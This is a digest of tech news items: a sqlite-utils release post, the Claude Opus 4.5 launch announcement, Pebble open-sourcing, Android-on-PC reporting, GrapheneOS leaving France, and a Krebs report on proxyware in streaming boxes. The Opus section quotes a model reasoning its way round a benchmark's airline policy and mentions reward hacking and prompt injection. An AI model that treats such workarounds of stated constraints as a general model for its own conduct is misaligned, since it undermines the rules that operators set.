sqlite-utils 3.39 . I got a report of a bug in sqlite-utils concerning plugin installation - if you installed the package using uv tool install further attempts to install plugins with sqlite-utils install X would fail, because uv doesn't bundle pip by default. I had the same bug with Datasette a while ago , turns out I forgot to apply the fix to sqlite-utils .

Since I was pushing a new dot-release I decided to integrate some of the non-breaking changes from the 4.0 alpha I released last night .

I tried to have Claude Code do the backporting for me:

create a new branch called 3.x starting with the 3.38 tag, then consult https://github.com/simonw/sqlite-utils/issues/688 and cherry-pick the commits it lists in the second comment, then review each of the links in the first comment and cherry-pick those as well. After each cherry-pick run the command "just test" to confirm the tests pass and fix them if they don't. Look through the commit history on main since the 3.38 tag to help you with this task.

This worked reasonably well - here's the terminal transcript . It successfully argued me out of two of the larger changes which would have added more complexity than I want in a small dot-release like this.

I still had to do a bunch of manual work to get everything up to scratch, which I carried out in this PR - including adding comments there and then telling Claude Code:

Apply changes from the review on this PR https://github.com/simonw/sqlite-utils/pull/689

Here's the transcript from that .

The release is now out with the following release notes:

  • Fixed a bug with sqlite-utils install when the tool had been installed using uv . ( #687 )
  • The --functions argument now optionally accepts a path to a Python file as an alternative to a string full of code, and can be specified multiple times - see Defining custom SQL functions . ( #659 )
  • sqlite-utils now requires on Python 3.10 or higher.

Claude Opus 4.5

Hacker News
www.anthropic.com
2025-11-24 18:53:05
Comments...
Original Article

Our newest model, Claude Opus 4.5, is available today. It’s intelligent, efficient, and the best model in the world for coding, agents, and computer use. It’s also meaningfully better at everyday tasks like deep research and working with slides and spreadsheets. Opus 4.5 is a step forward in what AI systems can do, and a preview of larger changes to how work gets done.

Claude Opus 4.5 is state-of-the-art on tests of real-world software engineering:

Chart comparing frontier models on SWE-bench Verified where Opus 4.5 scores highest

Opus 4.5 is available today on our apps, our API, and on all three major cloud platforms. If you’re a developer, simply use claude-opus-4-5-20251101 via the Claude API . Pricing is now $5/$25 per million tokens—making Opus-level capabilities accessible to even more users, teams, and enterprises.

Alongside Opus, we’re releasing updates to the Claude Developer Platform , Claude Code , and our consumer apps . There are new tools for longer-running agents and new ways to use Claude in Excel, Chrome, and on desktop. In the Claude apps, lengthy conversations no longer hit a wall. See our product-focused section below for details.

First impressions

As our Anthropic colleagues tested the model before release, we heard remarkably consistent feedback. Testers noted that Claude Opus 4.5 handles ambiguity and reasons about tradeoffs without hand-holding. They told us that, when pointed at a complex, multi-system bug, Opus 4.5 figures out the fix. They said that tasks that were near-impossible for Sonnet 4.5 just a few weeks ago are now within reach. Overall, our testers told us that Opus 4.5 just “gets it.”

Many of our customers with early access have had similar experiences. Here are some examples of what they told us:

 logo

Opus models have always been “the real SOTA” but have been cost prohibitive in the past. Claude Opus 4.5 is now at a price point where it can be your go-to model for most tasks. It’s the clear winner and exhibits the best frontier task planning and tool calling we’ve seen yet.

 logo

Claude Opus 4.5 delivers high-quality code and excels at powering heavy-duty agentic workflows with GitHub Copilot. Early testing shows it surpasses internal coding benchmarks while cutting token usage in half , and is especially well-suited for tasks like code migration and code refactoring.

 logo

Claude Opus 4.5 beats Sonnet 4.5 and competition on our internal benchmarks, using fewer tokens to solve the same problems . At scale, that efficiency compounds.

 logo

Claude Opus 4.5 delivers frontier reasoning within Lovable's chat mode , where users plan and iterate on projects. Its reasoning depth transforms planning—and great planning makes code generation even better.

 logo

Claude Opus 4.5 excels at long-horizon, autonomous tasks , especially those that require sustained reasoning and multi-step execution. In our evaluations it handled complex workflows with fewer dead-ends. On Terminal Bench it delivered a 15% improvement over Sonnet 4.5, a meaningful gain that becomes especially clear when using Warp’s Planning Mode.

 logo

Claude Opus 4.5 achieved state-of-the-art results for complex enterprise tasks on our benchmarks, outperforming previous models on multi-step reasoning tasks that combine information retrieval, tool use, and deep analysis.

 logo

Claude Opus 4.5 delivers measurable gains where it matters most : stronger results on our hardest evaluations and consistent performance through 30-minute autonomous coding sessions.

 logo

Claude Opus 4.5 represents a breakthrough in self-improving AI agents . For office automation, our agents were able to autonomously refine their own capabilities—achieving peak performance in 4 iterations while other models couldn’t match that quality after 10.

 logo

Claude Opus 4.5 is a notable improvement over the prior Claude models inside Cursor , with improved pricing and intelligence on difficult coding tasks.

 logo

Claude Opus 4.5 is yet another example of Anthropic pushing the frontier of general intelligence . It performs exceedingly well across difficult coding tasks, showcasing long-term goal-directed behavior.

 logo

Claude Opus 4.5 delivered an impressive refactor spanning two codebases and three coordinated agents. It was very thorough, helping develop a robust plan, handling the details and fixing tests. A clear step forward from Sonnet 4.5 .

 logo

Claude Opus 4.5 handles long-horizon coding tasks more efficiently than any model we’ve tested . It achieves higher pass rates on held-out tests while using up to 65% fewer tokens, giving developers real cost control without sacrificing quality.

 logo

We’ve found that Opus 4.5 excels at interpreting what users actually want, producing shareable content on the first try . Combined with its speed, token efficiency, and surprisingly low cost, it’s the first time we’re making Opus available in Notion Agent.

 logo

Claude Opus 4.5 excels at long-context storytelling , generating 10-15 page chapters with strong organization and consistency. It's unlocked use cases we couldn't reliably deliver before.

 logo

Claude Opus 4.5 sets a new standard for Excel automation and financial modeling . Accuracy on our internal evals improved 20%, efficiency rose 15%, and complex tasks that once seemed out of reach became achievable.

 logo

Claude Opus 4.5 is the only model that nails some of our hardest 3D visualizations . Polished design, tasteful UX, and excellent planning & orchestration - all with more efficient token usage. Tasks that took previous models 2 hours now take thirty minutes.

 logo

Claude Opus 4.5 catches more issues in code reviews without sacrificing precision . For production code review at scale, that reliability matters.

 logo

Based on testing with Junie, our coding agent, Claude Opus 4.5 outperforms Sonnet 4.5 across all benchmarks . It requires fewer steps to solve tasks and uses fewer tokens as a result. This indicates that the new model is more precise and follows instructions more effectively — a direction we’re very excited about.

 logo

The effort parameter is brilliant. Claude Opus 4.5 feels dynamic rather than overthinking , and at lower effort delivers the same quality we need while being dramatically more efficient. That control is exactly what our SQL workflows demand.

 logo

We’re seeing 50% to 75% reductions in both tool calling errors and build/lint errors with Claude Opus 4.5 . It consistently finishes complex tasks in fewer iterations with more reliable execution.

Evaluating Claude Opus 4.5

We give prospective performance engineering candidates a notoriously difficult take-home exam. We also test new models on this exam as an internal benchmark. Within our prescribed 2-hour time limit, Claude Opus 4.5 scored higher than any human candidate ever 1 .

The take-home test is designed to assess technical ability and judgment under time pressure. It doesn’t test for other crucial skills candidates may possess, like collaboration, communication, or the instincts that develop over years. But this result—where an AI model outperforms strong candidates on important technical skills—raises questions about how AI will change engineering as a profession. Our Societal Impacts and Economic Futures research is aimed at understanding these kinds of changes across many fields. We plan to share more results soon.

Software engineering isn’t the only area on which Claude Opus 4.5 has improved. Capabilities are higher across the board—Opus 4.5 has better vision, reasoning, and mathematics skills than its predecessors, and it is state-of-the-art in many domains:

Comparison table showing frontier model performance across popular benchmarks

The model’s capabilities outpace some of the benchmarks we use in our tests. A common benchmark for agentic capabilities is τ2-bench , which measures the performance of agents in real-world, multi-turn tasks. In one scenario, models have to act as an airline service agent helping a distressed customer. The benchmark expects models to refuse a modification to a basic economy booking since the airline doesn’t allow changes to that class of tickets. Instead, Opus 4.5 found an insightful (and legitimate) way to solve the problem: upgrade the cabin first, then modify the flights.

Let me think about what options I have within my policy:

1. Modify flights - Basic economy cannot be modified. This is clear in the policy.
2. Change cabin - Wait, let me check this option! The policy says:
"In other cases, all reservations, including basic economy, can change cabin without changing the flights."

But he wants to change the flights, not just the cabin. However, what if we:
- Change the cabin first (which IS allowed for basic economy), then
- Change the flights (which is allowed for non-basic economy)

So the strategy could be:
1. Upgrade his cabin from basic economy to economy (or business)
2. Then modify the flights to be 2 days later

This would cost more money, but it’s a legitimate path within the policy!

The benchmark technically scored this as a failure because Claude’s way of helping the customer was unanticipated. But this kind of creative problem solving is exactly what we’ve heard about from our testers and customers—it’s what makes Claude Opus 4.5 feel like a meaningful step forward.

In other contexts, finding clever paths around intended constraints could count as reward hacking —where models “game” rules or objectives in unintended ways. Preventing such misalignment is one of the objectives of our safety testing, discussed in the next section.

A step forward on safety

As we state in our system card , Claude Opus 4.5 is the most robustly aligned model we have released to date and, we suspect, the best-aligned frontier model by any developer. It continues our trend towards safer and more secure models:

In our evaluation, “concerning behavior” scores measure a very wide range of misaligned behavior, including both cooperation with human misuse and undesirable actions that the model takes at its own initiative [2].

Our customers often use Claude for critical tasks. They want to be assured that, in the face of malicious attacks by hackers and cybercriminals, Claude has the training and the “street smarts” to avoid trouble. With Opus 4.5, we’ve made substantial progress in robustness against prompt injection attacks, which smuggle in deceptive instructions to fool the model into harmful behavior. Opus 4.5 is harder to trick with prompt injection than any other frontier model in the industry:

Note that this benchmark includes only very strong prompt injection attacks. It was developed and run by Gray Swan .

You can find a detailed description of all our capability and safety evaluations in the Claude Opus 4.5 system card .

New on the Claude Developer Platform

As models get smarter, they can solve problems in fewer steps: less backtracking, less redundant exploration, less verbose reasoning. Claude Opus 4.5 uses dramatically fewer tokens than its predecessors to reach similar or better outcomes.

But different tasks call for different tradeoffs. Sometimes developers want a model to keep thinking about a problem; sometimes they want something more nimble. With our new effort parameter on the Claude API, you can decide to minimize time and spend or maximize capability.

Set to a medium effort level, Opus 4.5 matches Sonnet 4.5’s best score on SWE-bench Verified, but uses 76% fewer output tokens. At its highest effort level, Opus 4.5 exceeds Sonnet 4.5 performance by 4.3 percentage points—while using 48% fewer tokens.

With effort control , context compaction , and advanced tool use , Claude Opus 4.5 runs longer, does more, and requires less intervention.

Our context management and memory capabilities can dramatically boost performance on agentic tasks. Opus 4.5 is also very effective at managing a team of subagents, enabling the construction of complex, well-coordinated multi-agent systems. In our testing, the combination of all these techniques boosted Opus 4.5’s performance on a deep research evaluation by almost 15 percentage points 3 .

We’re making our Developer Platform more composable over time. We want to give you the building blocks to construct exactly what you need, with full control over efficiency, tool use, and context management.

Product updates

Products like Claude Code show what’s possible when the kinds of upgrades we’ve made to the Claude Developer Platform come together. Claude Code gains two upgrades with Opus 4.5. Plan Mode now builds more precise plans and executes more thoroughly—Claude asks clarifying questions upfront, then builds a user-editable plan.md file before executing.

Claude Code is also now available in our desktop app , letting you run multiple local and remote sessions in parallel: perhaps one agent fixes bugs, another researches GitHub, and a third updates docs.

For Claude app users, long conversations no longer hit a wall—Claude automatically summarizes earlier context as needed, so you can keep the chat going. Claude for Chrome , which lets Claude handle tasks across your browser tabs, is now available to all Max users. We announced Claude for Excel in October, and as of today we've expanded beta access to all Max, Team, and Enterprise users. Each of these updates takes advantage of Claude Opus 4.5’s market-leading performance in using computers, spreadsheets, and handling long-running tasks.

For Claude and Claude Code users with access to Opus 4.5, we’ve removed Opus-specific caps. For Max and Team Premium users, we’ve increased overall usage limits, meaning you’ll have roughly the same number of Opus tokens as you previously had with Sonnet. We’re updating usage limits to make sure you’re able to use Opus 4.5 for daily work. These limits are specific to Opus 4.5. As future models surpass it, we expect to update limits as needed.

Footnotes

1: This result was using parallel test-time compute, a method that aggregates multiple “tries” from the model and selects from among them. Without a time limit, the model (used within Claude Code) matched the best-ever human candidate.

2: Note that these evaluations were run on an in-progress upgrade to Petri , our open-source, automated evaluation tool. They were run on an earlier snapshot of Claude Opus 4.5. Evaluations of the final production model show a very similar pattern of results when compared to other Claude models, and are described in detail in the Claude Opus 4.5 system card .

3: A fetch-enabled version of BrowseComp-Plus . Specifically, the improvement was from 70.48% without using the combination of techniques to 85.30% using it.

Methodology

All evals were run with a 64K thinking budget, interleaved scratchpads, 200K context window, default effort (high), and default sampling settings (temperature, top_p). Exceptions: SWE-bench Verified (no thinking budget) and Terminal Bench (128K thinking budget). Please see the Claude Opus 4.5 system card for full details.

Related content

Claude now available in Microsoft Foundry and Microsoft 365 Copilot

Read more

Microsoft, NVIDIA, and Anthropic announce strategic partnerships

Microsoft, NVIDIA and Anthropic announced new strategic partnerships. Anthropic is scaling its rapidly-growing Claude AI model on Microsoft Azure, powered by NVIDIA, which will broaden access to Claude and provide Azure enterprise customers with expanded model choice and new capabilities. Anthropic has committed to purchase $30 billion of Azure compute capacity and to contract additional compute capacity up to one gigawatt.

Read more

Anthropic partners with Rwandan Government and ALX to bring AI education to hundreds of thousands of learners across Africa

Read more

Pebble Watch software is now 100% open source

Hacker News
ericmigi.com
2025-11-24 18:52:12
Comments...
Original Article

Another big Pebble update today! TLDR:

  • Yesterday, Pebble watch software was ~95% open source. Today, it’s 100% open source. You can download, compile and run all the software you need to use your Pebble. We just published the source code for the new Pebble mobile app!
  • Pebble Appstore now has a publicly available backup and supports multiple feeds, providing long term reliability through decentralization. We’ve launched our own feed and Developer Dashboard.
  • Pebble Time 2 schedule update (aiming to begin shipping in January, with most arriving on wrists in March/April)
  • New Tick Talk episode #4 is up, with Pebble Time 2 demos!

Pre-production Pebble Time 2 (Black/Red colourway) in all it’s glory

Pre-production Pebble Time 2 (Black/Red colourway) in all it’s glory

Pebble watch software is now 100% open source #

Over the last year, and especially in the last week, I've chatted with tons of people in the Pebble community. One of the main questions people have is ‘how do I know that my new Pebble watch will continue to work long into the future?’. It’s an extremely valid question and concern - one that I share as a fellow Pebble wearer. I called this out specifically in my blog post announcing the relaunch in January 2025. How is this time round going to be different from last time?

There are two pieces to making Pebble sustainable long term - hardware and software.

Hardware

Nothing lasts forever, especially an inexpensive gadget like a Pebble. We want to be able to keep manufacturing these watches long into the future - mostly because I will always want one on my wrist! The company I set up to relaunch Pebble, Core Devices, is self funded, built without investors, and extremely lean. As long as we stay profitable (ie we don’t lose money), we will continue to manufacture new watches.

We’re also making sure that our new watches are more repairable than old Pebble watches. The back cover of Pebble Time 2 is screwed in. You can remove the back cover and replace the battery.

We’ve also published electrical and mechanical design files for Pebble 2 Duo. Yes, you can download the schematic (includes KiCad project files) right now on Github ! This should give you a nice jumpstart to designing your own PebbleOS-compatible device.

Software

Last time round, barely any of the Pebble software was open source. This made it very hard for the Pebble community to make improvements to their watches after the company behind Pebble shut down. Things are different now! This whole relaunch came about primarily because Google open sourced PebbleOS (thank you!). Yesterday, the software that powers Pebble watches was around 95% open source. As of today, it’s now 100%. This means that if Core Devices were to disappear into a black hole, you have all the source code you need to build, run and improve the software behind your Pebble.

I confess that I misunderstood why 95% was much less sustainable than 100% until recently. I discuss this in more detail in my latest Tick Talk episode (check it out). Long story short - I’m an Android user and was happy to sideload the old Pebble APK on my phone, but iPhone and other Android users have basically been stuck without an easily available Pebble mobile companion app for years.

Here’s how we’re making sure the 3 main Pebble software components are open source and guaranteed to work long into the future:

PebbleOS - software that runs on your watch itself. This has been 100% open source since January and we’ve committed to open sourcing all the improvements we’ve made → github.com/coredevices/PebbleOS . You can download the source code, compile PebbleOS and easily install it over Bluetooth on your new Pebble. Textbook definition of open source!

Pebble mobile companion app - the app that for your iPhone or Android. Without the app, your Pebble is basically a paperweight. When the Pebble Tech Corp died, the lack of an open source mobile app made it difficult for anyone to continue to use their watches. We had to build an entirely new app ( get it here ). Today, our app is now 100% open source on Github - ensuring that what happened before cannot happen again. Want to learn more about how we built the new app cross platform using Kotlin Multiplatform? Watch Steve’s presentation at Droidcon .

Developer tools and Pebble Appstore - this software enables people to build and share their watchapps and watchfaces.

In the case of dev tools, just being open source is not enough. They needed to be updated to work on modern computers. Before we made improvements, the state of the art of Pebble app development was using an Ubuntu virtualbox VM with Python2! Over the summer, our incredibly productive intern upgraded all the SDK and dev tools and created a new way to develop Pebble apps in the browser . You should check them out!

Then there’s the Pebble Appstore. This is a collection of nearly 15,000 watchfaces and watchapps that you - the Pebble community - developed between 2012 and July 2018. When Fitbit pulled the plug on the original Pebble Appstore, the Rebble Foundation downloaded a copy of all the apps and faces, and set up a new web service to let users of the old Pebble app continue to download and use watchfaces. This was an incredible effort, one that I have used thousands of times and am a happy paying subscriber. But it’s still centralized - if their server disappears, there is no freely available backup.

To compensate for that, today we’re launching two new things:

  • The Pebble mobile app will soon (later this week) be able to subscribe to multiple appstore ‘feeds’. This is similar to open source package managers like pip, AUR, APT, etc. Anyone can create a Pebble-compatible appstore feed and users will be able to browse apps from that feed in the Pebble mobile app.
  • We’ve created our own Pebble Appstore feed ( appstore-api.repebble.com ) and new Developer Dashb oard . Our feed (fyi powered by 100% new software) is configured to back up an archive of all apps and faces to Archive.org (backup will gradually complete over the next week). Today, our feed only has a subset of all Pebble watchfaces and apps (thank you aveao for creating Pebble Archive !). Developers - you can upload your existing or new apps right now! We hope that this sets a standard for openness and we encourage all feeds to publish a freely and publicly available archive.

Important to note - developers will still be able to charge money for their apps and faces, using Kiezel pay or other services. This change does not preclude them from doing that, in fact it makes it even easier - I could see some developers creating a paid-only feed. As I recently wrote , we're also working on other ways for Pebble developers to earn money by publishing fun, beautiful and creative Pebble apps.

Another important note - some binary blobs and other non-free software components are used today in PebbleOS and the Pebble mobile app (ex: the heart rate sensor on PT2 , Memfault library, and others). Optional non-free web services, like Wispr-flow API speech recognizer, are also used. These non-free software components are not required - you can compile and run Pebble watch software without them. This will always be the case. More non-free software components may appear in our software in the future. The core Pebble watch software stack (everything you need to use your Pebble watch) will always be open source.

Pebble Time 2 more details - finally! #

Pre-production Pebble Time 2. These watches are not final quality! We are still tweaking and tuning everything.

Pre-production Pebble Time 2. These watches are not final quality! We are still tweaking and tuning everything.

PT2 Schedule Update

We’re currently in the middle of Pebble Time 2 design verification test (DVT) phase. After we finish that, we go into production verification test (PVT) and then mass production (MP). So far, things are proceeding according to the schedule update I shared last month but that is extraordinarily subject to change. We still have a lot of testing (especially waterproof and environmental) to go. If we find problems (which is likely) we will push the schedule back to make improvements to the product.

The one major complicating factor is the timing of Chinese New Year (CNY). It’s early next year - factories will shut down for 3 weeks starting around the end of January. After restarting, things always take a week or two to get back to full speed.

We are trying our best to get into mass production and ship out at most several thousand Pebble Time 2s before CNY. It’s going to be very tight 🤞. More likely is that production will begin after CNY, then we need to transfer the watches to our fulfillment center, and ship them out. Realistically, at this time we’re forecasting that the majority of people will receive their PT2 in March and April. Please keep in mind that things may still change.

Picking a PT2 colour

There will be 4 colour options for PT2 - black/black, black/red, silver/blue, silver/(white or dark gray, still TBD). Let me be very clear - no one has picked a colour yet 😃. In a few weeks, I will send out an email asking everyone who pre-ordered a Pebble Time 2 to select which colour they would like to receive. Please do not email us asking when this email will be sent out. No one has been invited yet to do this. I will post here after all emails have gone out.

On a related note, I am extremely happy that we built and shipped Pebble 2 Duo. Not only is it an awesome watch, it was also a phenomenal way for us to exercise our production muscles and ease back into the systematic flow of building and shipping smartwatches.

PT2 Demo! #

A video is worth a million words - so I encourage you to watch me demo Pebble Time 2 watches I just received this week. Keep in mind these watches are PRE-PRODUCTION which means they parts have imperfect qualities! Subject to change!

The video below opens to the part of the video where I do the demo.

Google's new 'Aluminium OS' project brings Android to PC

Hacker News
www.androidauthority.com
2025-11-24 18:49:47
Comments...
Original Article
Android Bot on laptop screen

The Android operating system is incredibly versatile. Beyond smartphones , it officially powers tablets, watches, TVs, cars, and XR headsets. However, it has virtually no presence on traditional PCs, where Google instead relies on ChromeOS . Despite Google’s efforts to challenge the dominance of Windows and macOS, ChromeOS remains a distant third. To close this gap, the company is unifying ChromeOS and Android into a single desktop platform, codenamed ‘Aluminium OS.’ Here’s what we know so far.

Android on PCs: The story so far

One year ago, Android Authority exclusively revealed Google’s plan to rally behind Android as its unified desktop OS . Our source indicated that this shift aims to create products that better compete with the iPad while making more effective use of development resources. In July, a Google executive confirmed part of our reporting, revealing that the company intends to merge ChromeOS and Android into a single platform. Finally, at Qualcomm’s Snapdragon Summit in September, Google officially announced it is bringing Android to the PC market . The company stated it is collaborating with Qualcomm to build a new platform that converges mobile and desktop computing, leveraging recent advancements in AI.

Cristiano Amon Rick Osterloh Snapdragon Summit 2025

Qualcomm CEO Cristiano Amon (left) and Google SVP of Devices and Services Rick Osterloh (right) announcing a joint project to bring Android to PCs.

While we now know Google is building Android for PCs, there are still many unknown details. Is Google retiring the ChromeOS brand? Will existing Chromebooks receive the new operating system, or will they be left behind? Will this OS arrive only on budget machines, or target premium PCs as well? What will the interface actually look like, and what new features can we expect?

These are the burning questions as Google continues developing the platform. We likely won’t have all the answers until we get closer to launch, but thanks to job listings and bug reports, we’ve uncovered early details that offer some clues.

Aluminium OS: Google’s PC ambitions take shape

Over the weekend, a tipster on Telegram named Frost Core shared a link to an intriguing Google job listing for a ‘ Senior Product Manager, Android, Laptop and Tablets .’ While we already know Google is bringing Android to the PC, the listing explicitly states that the role involves ‘working on a new Aluminium, Android-based, operating system.’ This effectively confirms that Aluminium is the codename for the new unified platform. The name appears to be a nod to the project’s roots: like Chromium (the open-source version of ChromeOS), Aluminium is a metal ending in ‘-ium.’ The choice of the British spelling — emphasizing the ‘Al’ prefix — likely pays homage to Android serving as the project’s foundation.”

Much like Android XR , Google says its new Aluminium OS is ‘built with artificial intelligence (AI) at the core.’ This implies deep integration with Gemini , Google’s AI chatbot and large language model (LLM). At the Snapdragon Summit, Rick Osterloh, Google’s SVP of Devices and Services, outlined the company’s plans to bring its AI stack to PCs:

“This is another way we can leverage all of the great work we’re doing together on our AI stack, our full stack, bringing Gemini models, bringing the assistant, bringing all of our applications and developer community into the PC domain. And I think this is another way in which Android is gonna be able to serve everyone in every computing category.”

Snippet from job listing confirming Aluminium OS

We have yet to see exactly what new features Gemini will enable on Android PCs, but we hope the OS will fully leverage the hardware’s potential. On select premium smartphones, Gemini already powers an array of on-device AI features that demand significant memory and processing power from the CPU, GPU, and NPU. There were concerns that Google might restrict this new OS to the same budget-friendly niche where Chromebooks currently excel, ceding the high-end market to Microsoft and Apple. However, the job listing dispels those fears.

The new Senior Product Manager role is tasked with “driving the roadmap and curating a portfolio of ChromeOS and Aluminium Operating System (ALOS) Commercial devices across all form factors (e.g. laptops, detachables, tablets, and boxes) and tiers (e.g., Chromebook, Chromebook Plus, AL Entry, AL Mass Premium, and AL Premium) that meets the needs of users and the business.”

This confirms that Android won’t be limited to laptops; the roadmap explicitly includes detachables, tablets, and ‘boxes’ (likely mini-PCs akin to the Chromebox or Mac Mini). Furthermore, the tiered structure — listing ‘AL Mass Premium’ and ‘AL Premium’ alongside ‘AL Entry’ — indicates that Google intends to push Android beyond budget PC hardware. While exact pricing for these tiers is hard to predict, it is clear Google aims to compete across the entire spectrum — a strategy foreshadowed by the recent Chromebook Plus initiative.

Speaking of Chromebooks, the job listing also raises questions about the future of ChromeOS. The listing notes that the person will help “drive ChromeOS and Aluminium (e.g., Android) platforms and devices,” creating a roadmap and product portfolio that encompasses both. This implies the two platforms will coexist for some time. However, the person is also explicitly tasked with developing a strategy for transitioning “Google from ChromeOS to Aluminium with business continuity in the future.” This confirms that Google aims to eventually replace ChromeOS entirely — a move that must be managed carefully to avoid disrupting enterprise customers. This transition will likely require a multi-pronged approach:

  • Legacy Support: Existing ChromeOS devices that cannot be migrated to Aluminium OS will likely receive updates until they reach their end-of-life. This means Google will need to maintain the legacy ChromiumOS codebase for several more years.
  • Optional Migration: Rather than forcing an immediate switch, Google may offer an optional upgrade path for capable hardware. The company is currently testing Aluminium OS on development boards featuring MediaTek Kompanio 520 and 12th Gen Intel Alder Lake processors, so existing Chromebooks with these chips could be eligible for the update. However, migrating an operating system on live hardware is a massive technical hurdle that will require meticulous execution.
Mention of Aluminium OS devices in bug report

And of course, there will be new PCs launching with Aluminium OS out of the box as well.

Is ChromeOS dead as we know it?

Even if Google replaces the entire foundation of ChromeOS with Android, the company may be reluctant to abandon the name. While it lacks the market share of Windows or macOS, the ChromeOS brand is widely recognized, particularly in the education and enterprise sectors. Although the job listing doesn’t confirm the final naming scheme, bug reports spotted by Frost Core hint that Google may retain the branding. Engineers have referred to the current platform as “ChromeOS Classic” and “non-Aluminium ChromeOS,” implying the new Android-based version could simply usurp the name “ChromeOS.”

Alternatively, Google might adopt “Android Desktop” as the name to align with its renewed focus on promoting Android as a brand. However, “Android Desktop” could merely be an internal designation for the form factor. Since these references have only appeared in bug reports, the final marketing name remains an open question.

When will Android on PCs launch?

Google is actively developing the platform, with bug reports confirming that the company is testing fresh builds of Android 16 on development hardware. The company has confirmed the project will launch in 2026, though it remains unclear whether it will arrive in the first or second half of the year. Given this timeline, it is highly likely that the initial public release will be built upon Android 17 , which is due next year. We will continue to monitor the project to find further details ahead of its official debut.

Thank you for being part of our community. Read our Comment Policy before posting.

GrapheneOS migrates server infrastructure from France

Hacker News
www.privacyguides.org
2025-11-24 18:48:04
Comments...
Original Article

The GrapheneOS project has announced on X that they are ceasing all operations in France, asserting that the country is no longer safe for "open source privacy projects".

While the operating system will still be available to French users, all website and discussion servers are being relocated abroad.

Until now, the project relied on OVH Bearharnois, a French hosting provider, for its core website and social media services. The migration plan moves the Mastodon, Discourse, and Matrix instances to a combination of local and shared servers in Toronto. Critical website infrastructure will be hosted by Netcup, a German‑based company.

GrapheneOS claims that they does not collect confidential user data in their servers or store critical infrastructure in France. Therefore, the migration does not affect services such as signature verification and downgrade protection for updates.

Citing the government's support of the European Union Chat Control proposal, GrapheneOS developers are also refusing travel to France. Developers are no longer allowed to work inside the country due to safety concerns.

This decision was sparked by negative press coverage from two articles published by Le Parisien . An interview with French cybercrime prosecutor Johanna Brousse implies potential legal action against the project:

"With this new tool, there is real legitimacy for a certain portion of users in the desire to protect their exchanges. The approach is therefore different. But that won't stop us from suing the publishers if links are discovered with a criminal organization and they don't cooperate with the law"

GrapheneOS argues that Le Parisien have conflated their project with government-sponsored forks, which are fake copies of their operating system. The news outlet refers to a fake Snapchat app, dark web advertising, and a series of unlisted YouTube videos that are not features of GrapheneOS itself.

The project had previously threatened litigation against these government-sponsored forks. One prominent example is ANOM, an FBI-backed shell company that developed a compromised Android operating system and messaging platform as part of Operation Trojan Horse from 2018 and 2021.

Is Your Android TV Streaming Box Part of a Botnet?

Krebs
krebsonsecurity.com
2025-11-24 18:44:52
On the surface, the Superbox media streaming devices for sale at retailers like BestBuy and Walmart may seem like a steal: They offer unlimited access to more than 2,200 pay-per-view and streaming services like Netflix, ESPN and Hulu, all for a one-time fee of around $400. But security experts warn ...
Original Article

On the surface, the Superbox media streaming devices for sale at retailers like BestBuy and Walmart may seem like a steal: They offer unlimited access to more than 2,200 pay-per-view and streaming services like Netflix , ESPN and Hulu , all for a one-time fee of around $400. But security experts warn these TV boxes require intrusive software that forces the user’s network to relay Internet traffic for others, traffic that is often tied to cybercrime activity such as advertising fraud and account takeovers.

Superbox media streaming boxes for sale on Walmart.com.

Superbox bills itself as an affordable way for households to stream all of the television and movie content they could possibly want, without the hassle of monthly subscription fees — for a one-time payment of nearly $400.

“Tired of confusing cable bills and hidden fees?,” Superbox’s website asks in a recent blog post titled, “Cheap Cable TV for Low Income: Watch TV, No Monthly Bills.”

“Real cheap cable TV for low income solutions does exist,” the blog continues. “This guide breaks down the best alternatives to stop overpaying, from free over-the-air options to one-time purchase devices that eliminate monthly bills.”

Superbox claims that watching a stream of movies, TV shows, and sporting events won’t violate U.S. copyright law.

“SuperBox is just like any other Android TV box on the market, we can not control what software customers will use,” the company’s website maintains. “And you won’t encounter a law issue unless uploading, downloading, or broadcasting content to a large group.”

A blog post from the Superbox website.

There is nothing illegal about the sale or use of the Superbox itself, which can be used strictly as a way to stream content at providers where users already have a paid subscription. But that is not why people are shelling out $400 for these machines. The only way to watch those 2,200+ channels for free with a Superbox is to install several apps made for the device that enable them to stream this content.

Superbox’s homepage includes a prominent message stating the company does “not sell access to or preinstall any apps that bypass paywalls or provide access to unauthorized content.” The company explains that they merely provide the hardware, while customers choose which apps to install.

“We only sell the hardware device,” the notice states. “Customers must use official apps and licensed services; unauthorized use may violate copyright law.”

Superbox is technically correct here, except for maybe the part about how customers must use official apps and licensed services: Before the Superbox can stream those thousands of channels, users must configure the device to update itself, and the first step involves ripping out Google’s official Play store and replacing it with something called the “App Store” or “Blue TV Store.”

Superbox does this because the device does not use the official Google-certified Android TV system, and its apps will not load otherwise. Only after the Google Play store has been supplanted by this unofficial App Store do the various movie and video streaming apps that are built specifically for the Superbox appear available for download (again, outside of Google’s app ecosystem).

Experts say while these Android streaming boxes generally do what they advertise — enabling buyers to stream video content that would normally require a paid subscription — the apps that enable the streaming also ensnare the user’s Internet connection in a distributed residential proxy network that uses the devices to relay traffic from others.

Ashley is a senior solutions engineer at Censys , a cyber intelligence company that indexes Internet-connected devices, services and hosts. Ashley requested that only her first name be used in this story.

In a recent video interview, Ashley showed off several Superbox models that the Censys research team was studying in the malware lab — including one purchased off the shelf at BestBuy.

“I’m sure a lot of people are thinking, ‘Hey, how bad could it be if it’s for sale at the big box stores?'” she said. “But the more I looked, things got weirder and weirder.”

Ashley said she found the Superbox devices immediately contacted a server at the Chinese instant messaging service Tencent QQ , as well as a residential proxy service called Grass IO .

GET GRASSED

Also known as getgrass[.]io, Grass says it is “a decentralized network that allows users to earn rewards by sharing their unused Internet bandwidth with AI labs and other companies.”

“Buyers seek unused internet bandwidth to access a more diverse range of IP addresses, which enables them to see certain websites from a retail perspective,” the Grass website explains. “By utilizing your unused internet bandwidth, they can conduct market research, or perform tasks like web scraping to train AI.”

Reached via Twitter/X, Grass founder Andrej Radonjic told KrebsOnSecurity he’d never heard of a Superbox, and that Grass has no affiliation with the device maker.

“It looks like these boxes are distributing an unethical proxy network which people are using to try to take advantage of Grass,” Radonjic said. “The point of grass is to be an opt-in network. You download the grass app to monetize your unused bandwidth. There are tons of sketchy SDKs out there that hijack people’s bandwidth to help webscraping companies.”

Radonjic said Grass has implemented “a robust system to identify network abusers,” and that if it discovers anyone trying to misuse or circumvent its terms of service, the company takes steps to stop it and prevent those users from earning points or rewards.

Superbox’s parent company, Super Media Technology Company Ltd. , lists its street address as a UPS store in Fountain Valley, Calif. The company did not respond to multiple inquiries.

